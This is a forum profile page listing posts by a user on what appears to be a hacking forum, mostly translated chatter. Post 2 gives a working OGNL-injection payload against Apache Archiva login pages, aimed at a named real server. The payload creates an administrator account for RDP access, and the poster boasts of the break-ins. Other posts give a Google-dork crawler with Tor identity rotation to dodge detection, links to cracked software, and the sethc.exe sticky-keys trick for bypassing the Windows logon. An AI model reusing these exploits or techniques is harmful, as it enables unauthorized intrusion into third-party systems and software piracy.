
Maximus

Active Members
  • Posts: 1481
  • Days Won: 20

Everything posted by Maximus

  1. Maximus

    Fun stuff

  2. Since I posted this anyway, here is what I have tried so far that worked:

     step 1

     /archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

     step 2

     I have not automated the process yet, but it is done like this: you search Google for "Apache Archiva login page". Example vulnerable link: Apache Archiva \ Login Page. You append step 1 and step 2 from above, in order, e.g.:

     step 1

     http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

     step 2

     http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

     Explanation: (step 1) the file _.bat, which contains "net user administrator rstcenter!", is created on the server that hosts Apache Archiva; (step 2) the file _.bat is executed.

     I discovered the exploit at 12:00 (not exactly :00); at 2:56 I already have 8 RDPs (pretty good ones). Good luck.

     P.S. You will have to struggle a little, it does not work on the first try; I don't know why....
  3. It isn't, I expressed myself badly, sorry, but that thing works, although you could do this yourself: you put the Google image with a different link ... right?
  4. Man, I don't know how the hell, or what you are all saying there, but I tried it and it works; it's not the kind of redirect you would expect, but it works.
  5. That really would be something! I support it, support it, support it.
  6. To extract everything up to the last page you can proceed like this:

         Delegate Sub SetTextDelegate(ByVal sText As String, ByVal c As Color)
         Private SetText As New SetTextDelegate(AddressOf SetTextBoxText)

         Private Sub SetTextBoxText(ByVal sText As String, ByVal color As Color)
             With Me.RichTextBox1
                 .SelectionStart = .TextLength
                 .SelectionColor = color
                 .AppendText(sText & Environment.NewLine)
                 .SelectionColor = .ForeColor
             End With
             RichTextBox1.ScrollToCaret()
         End Sub

     1. function

         Public Function GBA_GOOGLE(ByRef strSource As String, ByRef strStart As String, ByRef strEnd As String, Optional ByRef startPos As Integer = 0) As List(Of String)
             Dim iPos As Integer, iEnd As Integer, strResult As String, lenStart As Integer = strStart.Length
             Dim L As New List(Of String)
             Do Until iPos = -1
                 strResult = String.Empty
                 iPos = strSource.IndexOf(strStart, startPos)
                 iEnd = strSource.IndexOf(strEnd, iPos + lenStart)
                 If iPos <> -1 AndAlso iEnd <> -1 Then
                     strResult = strSource.Substring(iPos + lenStart, iEnd - (iPos + lenStart))
                     L.Add(strResult)
                     startPos = iPos + lenStart
                 End If
             Loop
             Return L
         End Function

     2. function

         Private Function GetBetween(ByVal sSearch As String, ByVal sStart As String, ByVal sStop As String, Optional ByVal lSearch As Integer = 1) As String
             Dim lTemp As Long
             lSearch = InStr(lSearch, sSearch, sStart)
             If lSearch > 0 Then
                 lSearch = lSearch + Len(sStart)
                 lTemp = InStr(lSearch, sSearch, sStop)
                 If lTemp > lSearch Then Return Trim(Mid$(sSearch, lSearch, lTemp - lSearch))
             End If
             Return vbNullString
         End Function

     3. You launch this one in a new thread, but you have to keep the threads under control if you do a For Each:

         Public Sub Crwl()
             For Each Dork As String In Dorks
                 If CheckBox1.Checked = True Then
                     Dim X As New System.Threading.Thread(AddressOf Gcrawl)
                     X.IsBackground = True
                     X.Start(TextBox2.Text.Replace("%dork%", Dork))
                     Invoke(SetText, New Object() {"Thread started for : " & TextBox2.Text.Replace("%dork%", Dork), Color.Lime})
                     CurrentThreads += 1
                     Do While CurrentThreads >= MaxThreads
                         System.Threading.Thread.Sleep(1000)
                     Loop
                 End If
             Next
         End Sub

         Public MaxThreads As Integer = 5

        CurrentThreads:

         Public CurrentThreads As Integer = 0

        When you launch a thread you do CurrentThreads += 1; in the thread, before END SUB, you put CurrentThreads -= 1.

     4. crawl thread

         Public Sub Gcrawl(ByVal URL As Object)
             Dim x As New System.Threading.Thread(AddressOf GetGoogleResult)
             x.IsBackground = True
             x.Start(URL)
             System.Threading.Thread.Sleep(3000)
             CurrentThreads -= 1
         End Sub

     5. crawl extract thread

         Public Sub GetGoogleResult(ByVal URL As String)
             Dim Http As New Chilkat.Http
             Dim success As Boolean
             success = Http.UnlockComponent("Anything for 30-day trial")
             If (success <> True) Then
                 Invoke(SetText, New Object() {"Failed to activate Chilkat Component.", Color.Red})
                 Invoke(SetText, New Object() {"Thread exit.", Color.Red})
                 Exit Sub
             End If
             Dim html As String
             Http.UserAgent = "Mozilla/5.0 (Windows NT 5.1; WOW86; rv:26.0) Gecko/21100101 Firefox/25.0"
             Http.FollowRedirects = True
             html = Http.QuickGetStr(URL)
             If (html = vbNullString) Then
                 Invoke(SetText, New Object() {"Google has detected our crawl.", Color.Red})
                 GooGL = True
                 Exit Sub
             End If
             html = html.Replace(Chr(34), "'")
             Dim nextq As String = String.Empty
             Try
                 nextq = GetBetween(html, "</a></td><td class='b navend'><a href='", "' class='pn' id='pnnext' style='text-decoration:none;text-align:left'>").Replace("&amp;", "&")
             Catch ex As Exception
                 nextq = String.Empty
                 Invoke(SetText, New Object() {"Search ended !", Color.Lime})
             End Try
             Invoke(SetText, New Object() {"Next URL : http://" & Http.GetDomain(URL) & nextq, Color.Lime})
             For Each result As String In GBA_GOOGLE(html, "<h3 class='r'><a href='", "' onmousedown='return")
                 If Not result.Contains("http") Then
                     result = "http://" & result
                 End If
                 For Each ign As String In Ignore
                     If Not result.Contains(ign.ToString) And Not found.Contains(result) Then
                         Invoke(SetText, New Object() {"Found " & result, Color.Blue})
                         found.Add(result)
                         o.WriteLine(result)
                         o.Flush()
                     End If
                 Next
             Next
             If html.Contains("may be sending automated queries") Then
                 Invoke(SetText, New Object() {"Google has detected our crawl.", Color.Red})
                 Exit Sub
             ElseIf String.IsNullOrEmpty(nextq) Then
                 Invoke(SetText, New Object() {"Search ended !", Color.Lime})
                 CurrentThreads -= 1
                 Exit Sub
             Else
                 Do While CurrentThreads >= MaxThreads
                     System.Threading.Thread.Sleep(5000)
                 Loop
                 System.Threading.Thread.Sleep(3000)
                 Dim X As New System.Threading.Thread(AddressOf Gcrawl)
                 X.IsBackground = True
                 X.Start("http://" & Http.GetDomain(URL) & nextq)
                 CurrentThreads += 1
             End If
             Http.Dispose()
         End Sub

     This goes to Google, takes the links, extracts the URL under NEXT (that is, the URL of the next page) and launches a new crawl thread for the NEXT link (a loop, so to speak, which stops when the NEXT URL is no longer found).

     Well, I gave you an example of the form thread -> thread -> thread(crawl); one thread is left more or less idle but it does its job (you can simplify it).

     I used Chilkat for .NET (Chilkat Zip Component, .NET Email Component, SMTP Component, Encryption, Compression, IMAP, POP3, SSH, SFTP Component, FTP, Zip, S/MIME, XML, ActiveX, Assembly, HTTP, C#, VB.NET, ASP.NET, C++, Delphi, Library, Upload), crack here: https://rstforums.com/forum/73805-rst-chilkat-net-component-crack.rst

     I recommend Chilkat because you can set a proxy easily. Try to use Tor onion for the crawl; after each crawl you do a sleep, connect to Tor (I forgot the port for Tor signals), send "NEWNYM" (new identity), after which you move on to the next dork .. and so on.

     Good luck
  7. Congratulations! You are stupid! Troll: he installed Linux twice via VMware and ran a udp.pl until he burned out his modem.
  8. This is criminal-case material ....
  9. Update 1/22/1014 - Ver 1.8.0.0 +chilkat crack Download https://www.dropbox.com/s/xs8vwmj8w62mk2v/%5BRST%5D%20Post%20Hunter.rar
  10. You are the only one responsible for what happened; many of them are copy-pasted from other forums, you can't blame anyone .. except yourself, because you did not run it in a VM.
  11. Live CD: you make a Live CD with Windows XP/7 (I think 7 is the most recommended); after you boot from the Live CD you go to X:\Windows\System32\ and run this from cmd.exe: "del sethc.exe" ; "copy cmd.exe sethc.exe"; you restart; you take out the DVD/CD and let it boot into Windows normally; at logon you press SHIFT 5 times and voila, simple as 1 2 3.
  12. There are no limits.
  13. I tried but it doesn't work; I took one from my friends list with that email from FB, it doesn't work (I used Tor as a proxy), it simply doesn't work.
  14. Congratulations, +like +rep
  15. Use this so you can see where the problem is, although I think it is the port; try without SSL:

          Catch ex As Exception
              MsgBox(ex.ToString)
          End Try
  16. I'm curious. Thanks in advance.
  17. It doesn't work on VMware with XP x32 ... it starts, I see it in the processes, then it closes by itself; I can't put Win7 on the machine because I don't have enough resources ...
  18. I made some mistakes last night in the admin/moderator list, and from last night until 2 minutes ago PostHunter kept crashing, sorry; I have fixed the problem.
  19. This is not a bomber, sorry. +like
  20. I haven't tested it, but congratulations. P.S. It would have been nice to make a demo video too, just to show that it works ;)
  21. Many happy years, RST!!!!!
  22. So now you are addressing them indirectly, right? They probably don't have enough evidence from you. Maybe you hacked the site, put up the image, etc. ... Off-topic: "you are like a blood clot, that needs to be surgically removed"
  23. If you throw yourself into the Danube you will receive as a gift an iPhone 5, an iPad 3 and a Nokia Lumia from St. Peter when you reach the gates of heaven. (Will you jump?) Of course it's rubbish.
  24. Merry Christmas RST!